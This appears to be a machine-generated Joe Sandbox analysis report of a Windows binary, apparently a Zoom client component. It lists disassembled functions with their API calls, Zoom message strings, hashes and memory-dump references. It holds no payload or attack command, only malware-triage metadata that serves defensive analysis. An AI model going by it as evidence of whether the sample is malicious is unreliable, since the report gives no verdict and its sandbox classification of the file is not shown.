                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$??0?$File@$?_cstring_set@AssignAssign@?$Close@CreateD@1@FileH_prolog3_Other@?$String@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@1@@W@2@@W@2@@std@@@W@std@@Write@cmm_fs_write
                • String ID: last_log_file_id.txt
                • API String ID: 438820029-1594190529
                • Opcode ID: 0fdb49ffb8918110fc185356e079b132c8b6a4d8e4917df571ccba1de82a85de
                • Instruction ID: 92a48be7855ccb3f9b12522f05ed1a56713090388f58278e2d2ea30103dc9500
                • Opcode Fuzzy Hash: 0fdb49ffb8918110fc185356e079b132c8b6a4d8e4917df571ccba1de82a85de
                • Instruction Fuzzy Hash: 6141F575C00318DFDB24DFA4C891ADDBBB4AF18305F94842AE81677252DB706A89DB25
                Function 00CB4C5A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CB768F,?,?,?,?,?,?,00000028), ref: 00CB4C76
                • GetModuleHandleW.KERNEL32(Kernelbase.dll,?,?,00CB768F,?,?,?,?,?,?,00000028), ref: 00CB4C90
                • GetProcAddress.KERNEL32(00000000,LoadLibraryExW), ref: 00CB4CA9
                • GetProcAddress.KERNEL32(00000000,LoadLibraryExW), ref: 00CB4CC1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Kernelbase.dll$LoadLibraryExW$kernel32.dll
                • API String ID: 1646373207-1600517536
                • Opcode ID: 9b92a26125a8d235f288a4795ef3561e9276e51e36c5cafdc4c5471542c906da
                • Instruction ID: 8ae1cdf155b7920fba79f7bd70780ea31ca49e342f97c4c12fd3277da0618fa8
                • Opcode Fuzzy Hash: 9b92a26125a8d235f288a4795ef3561e9276e51e36c5cafdc4c5471542c906da
                • Instruction Fuzzy Hash: 80F04435746321AF8B288B79BE949B73AA99B85F917018139EC16D3351DF20CD42C6B4
                Function 00C74180 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74187
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.lcp.record.operate,00002769,Key,Value,Section,OperationType,00000004), ref: 00C741B1
                  • Part of subcall function 00C885B0: __EH_prolog3.LIBCMT ref: 00C885B7
                  • Part of subcall function 00C885B0: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7E368,?,?,?,?,?,?,00000004,00C69E19,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C885D0
                  • Part of subcall function 00C92BC0: __EH_prolog3_GS.LIBCMT ref: 00C92BC7
                  • Part of subcall function 00C92BC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92BF9
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92C27
                  • Part of subcall function 00C92BC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type), ref: 00C92C64
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId), ref: 00C92C94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$H0000@H000@H_prolog3_Node@23@Root@Template_3@Template_4@TreeV12@@
                • String ID: Key$OperationType$Section$Value$com.Zoom.app.conf.lcp.record.operate
                • API String ID: 2902713577-2369004328
                • Opcode ID: e85534b511090800511a5b51b609331f4e149bf8591fc15af396032aee14657f
                • Instruction ID: 6c318c9e0166eba3f434a31b01763040214e885a6847bcd3429baa84e90c8db2
                • Opcode Fuzzy Hash: e85534b511090800511a5b51b609331f4e149bf8591fc15af396032aee14657f
                • Instruction Fuzzy Hash: 91F0ECB5744B58FFDB20BB446C56F3B61A49B50F15F900568B104AA3C1CBF04D8892FC
                Function 00C72B70 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72B77
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C72BA1
                  • Part of subcall function 00C885B0: __EH_prolog3.LIBCMT ref: 00C885B7
                  • Part of subcall function 00C885B0: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7E368,?,?,?,?,?,?,00000004,00C69E19,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C885D0
                  • Part of subcall function 00C92BC0: __EH_prolog3_GS.LIBCMT ref: 00C92BC7
                  • Part of subcall function 00C92BC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92BF9
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92C27
                  • Part of subcall function 00C92BC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type), ref: 00C92C64
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId), ref: 00C92C94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$H0000@H000@H_prolog3_Node@23@Root@Template_3@Template_4@TreeV12@@
                • String ID: Type$com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify$strMsg$strUserId$strUserName
                • API String ID: 2902713577-1802342954
                • Opcode ID: c095c30a6deb8716ceb8140bcc962b0686dd2c45c20ab39e3f4adce1c3f0b1a8
                • Instruction ID: 27ead2e2af3995a58650482b0632601cc0a6f725723cf6df54248288665b2f91
                • Opcode Fuzzy Hash: c095c30a6deb8716ceb8140bcc962b0686dd2c45c20ab39e3f4adce1c3f0b1a8
                • Instruction Fuzzy Hash: 1DF06571B80381FFD710AB559C56F6B6664EB50F29F80842CB1146E3D2CBF54E08C6B1
                Function 00C701E0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C701E7
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.zpns.meeting.start,0000275D,strType,meetingId,meetingNumber,originalMeetingNumber,00000004), ref: 00C7020F
                  • Part of subcall function 00C85340: __EH_prolog3.LIBCMT ref: 00C85347
                  • Part of subcall function 00C85340: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7FCD8,?,?,?,?,?,?,00000004,00C67ED9,com.Zoom.app.pt.startAppShare), ref: 00C85360
                  • Part of subcall function 00C90C5C: __EH_prolog3_GS.LIBCMT ref: 00C90C63
                  • Part of subcall function 00C90C5C: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7023B), ref: 00C90C77
                  • Part of subcall function 00C90C5C: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,00000044,00C7023B), ref: 00C90CA9
                  • Part of subcall function 00C90C5C: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C90CE6
                  • Part of subcall function 00C90C5C: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,?,-00000004), ref: 00C90D18
                  • Part of subcall function 00C90C5C: EnterCriticalSection.KERNEL32(00C7023B), ref: 00C90D9A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@V12@@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: com.Zoom.app.pt.notify.zpns.meeting.start$meetingId$meetingNumber$originalMeetingNumber$strType
                • API String ID: 2242627570-116605177
                • Opcode ID: 8daecf815f94032f53f432a79812705748b35a815318d8d1815860c64dc2fb83
                • Instruction ID: 39ad7005b4940e74baa0238bd9b3af890db6aed2df4428043523308331ef261c
                • Opcode Fuzzy Hash: 8daecf815f94032f53f432a79812705748b35a815318d8d1815860c64dc2fb83
                • Instruction Fuzzy Hash: 96E06DB1644750AEC7107B68980AB5A7660AF10B59F444578B1146E2D1CBF44908D7B6
                Function 00C6C220 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C227
                • ??0?$CmmMessageTemplate_4@IIV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.framework.setting.updated,0000753C,policy_scene,message_type,key,dest_process,00000004), ref: 00C6C24F
                  • Part of subcall function 00C8BE40: __EH_prolog3.LIBCMT ref: 00C8BE47
                  • Part of subcall function 00C8BE40: ??0?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6C254,com.zoom.app.framework.setting.updated,0000753C,policy_scene,message_type,key,dest_process,00000004), ref: 00C8BE60
                  • Part of subcall function 00C8BFFD: __EH_prolog3_GS.LIBCMT ref: 00C8C004
                  • Part of subcall function 00C8BFFD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C27B), ref: 00C8C018
                  • Part of subcall function 00C8BFFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.framework.setting.updated,00000044,00C6C27B), ref: 00C8C04A
                  • Part of subcall function 00C8BFFD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8C087
                  • Part of subcall function 00C8BFFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.framework.setting.updated,?,-00000004), ref: 00C8C0B9
                  • Part of subcall function 00C8BFFD: EnterCriticalSection.KERNEL32(00C6C27B), ref: 00C8C13B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: com.zoom.app.framework.setting.updated$dest_process$key$message_type$policy_scene
                • API String ID: 1612829399-2358021257
                • Opcode ID: 1ea3c70280756c75669b6de8837bd077a3c6d1cc140c65836c8fbf17cff4986e
                • Instruction ID: 9fa650f78fe33f1cbb015f2a9b60c496099275825af34585fa6f5c78fc6282a7
                • Opcode Fuzzy Hash: 1ea3c70280756c75669b6de8837bd077a3c6d1cc140c65836c8fbf17cff4986e
                • Instruction Fuzzy Hash: 2CE09BB4BC4380BACB2077589C4775E76506B20B15F414668B650192D7CBF84504DB75
                Function 00C6C470 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C477
                • ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IV12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.pt.mediaapi.response,0000274A,requestID,response_code,response_data,in_meeting,00000004), ref: 00C6C49F
                  • Part of subcall function 00C8C3D0: __EH_prolog3.LIBCMT ref: 00C8C3D7
                  • Part of subcall function 00C8C3D0: ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6C4A4,com.Zoom.app.pt.mediaapi.response,0000274A,requestID,response_code,response_data,in_meeting,00000004), ref: 00C8C3F0
                  • Part of subcall function 00C8C570: __EH_prolog3_GS.LIBCMT ref: 00C8C577
                  • Part of subcall function 00C8C570: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C4CB), ref: 00C8C58B
                  • Part of subcall function 00C8C570: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,00000044,00C6C4CB), ref: 00C8C5BD
                  • Part of subcall function 00C8C570: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8C5FA
                  • Part of subcall function 00C8C570: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,?,-00000004), ref: 00C8C62C
                  • Part of subcall function 00C8C570: EnterCriticalSection.KERNEL32(00C6C4CB), ref: 00C8C6AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@V12@@
                • String ID: com.Zoom.app.pt.mediaapi.response$in_meeting$requestID$response_code$response_data
                • API String ID: 3479804182-917114086
                • Opcode ID: 698f6ebc8fdf73b95b11d697a0a1b4fcb9724e18386d36b15387b36ca6de7093
                • Instruction ID: 3837951b922d762b7cf2988103ef88b6ed07a3628c78d782eb09fe3606b282a6
                • Opcode Fuzzy Hash: 698f6ebc8fdf73b95b11d697a0a1b4fcb9724e18386d36b15387b36ca6de7093
                • Instruction Fuzzy Hash: 4AE092B1A80340BEDB10BB64AD4777E6290AB00B59F818128B2855A2E1CFF45908D77E
                Function 00C6A580 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A587
                • ??0?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.promptProxyAuth,0000272F,TheProxyType,Server,Port,Description,00000004), ref: 00C6A5AF
                  • Part of subcall function 00C89090: __EH_prolog3.LIBCMT ref: 00C89097
                  • Part of subcall function 00C89090: ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6A5B4,com.zoom.app.promptProxyAuth,0000272F,TheProxyType,Server,Port,Description,00000004), ref: 00C890B0
                  • Part of subcall function 00C89270: __EH_prolog3_GS.LIBCMT ref: 00C89277
                  • Part of subcall function 00C89270: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6A5DB), ref: 00C8928B
                  • Part of subcall function 00C89270: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.promptProxyAuth,00000044,00C6A5DB), ref: 00C892BD
                  • Part of subcall function 00C89270: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C892FA
                  • Part of subcall function 00C89270: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.promptProxyAuth,?,-00000004), ref: 00C8932C
                  • Part of subcall function 00C89270: EnterCriticalSection.KERNEL32(00C6A5DB), ref: 00C893AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: Description$Port$Server$TheProxyType$com.zoom.app.promptProxyAuth
                • API String ID: 2908724648-1665129770
                • Opcode ID: fb6b2e19c44c45c9ca779dd364695bee0b4f49131f49a8641f63f3f779cba429
                • Instruction ID: 64ac140206dbc470b0cdb58039ec417946e0835da6901f907157f25f89041140
                • Opcode Fuzzy Hash: fb6b2e19c44c45c9ca779dd364695bee0b4f49131f49a8641f63f3f779cba429
                • Instruction Fuzzy Hash: 9EE09B70B40750AAC7147B55B80B75D77609700B65F444518B102692E5CBF0050CDF76
                Function 00C68550 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68557
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@I_JI@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.inviteFacebookBuddy,0000271A,MeetingID,parentWnd,MeetingNumber,TabOrder,00000004), ref: 00C6857F
                  • Part of subcall function 00C85D70: __EH_prolog3.LIBCMT ref: 00C85D77
                  • Part of subcall function 00C85D70: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C68584,com.Zoom.app.conf.inviteFacebookBuddy,0000271A,MeetingID,parentWnd,MeetingNumber,TabOrder,00000004), ref: 00C85D90
                  • Part of subcall function 00C85F9D: __EH_prolog3_GS.LIBCMT ref: 00C85FA4
                  • Part of subcall function 00C85F9D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C685AB), ref: 00C85FB8
                  • Part of subcall function 00C85F9D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inviteFacebookBuddy,00000044,00C685AB), ref: 00C85FEA
                  • Part of subcall function 00C85F9D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C86027
                  • Part of subcall function 00C85F9D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inviteFacebookBuddy,?,-00000004), ref: 00C86059
                  • Part of subcall function 00C85F9D: EnterCriticalSection.KERNEL32(00C685AB), ref: 00C860DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
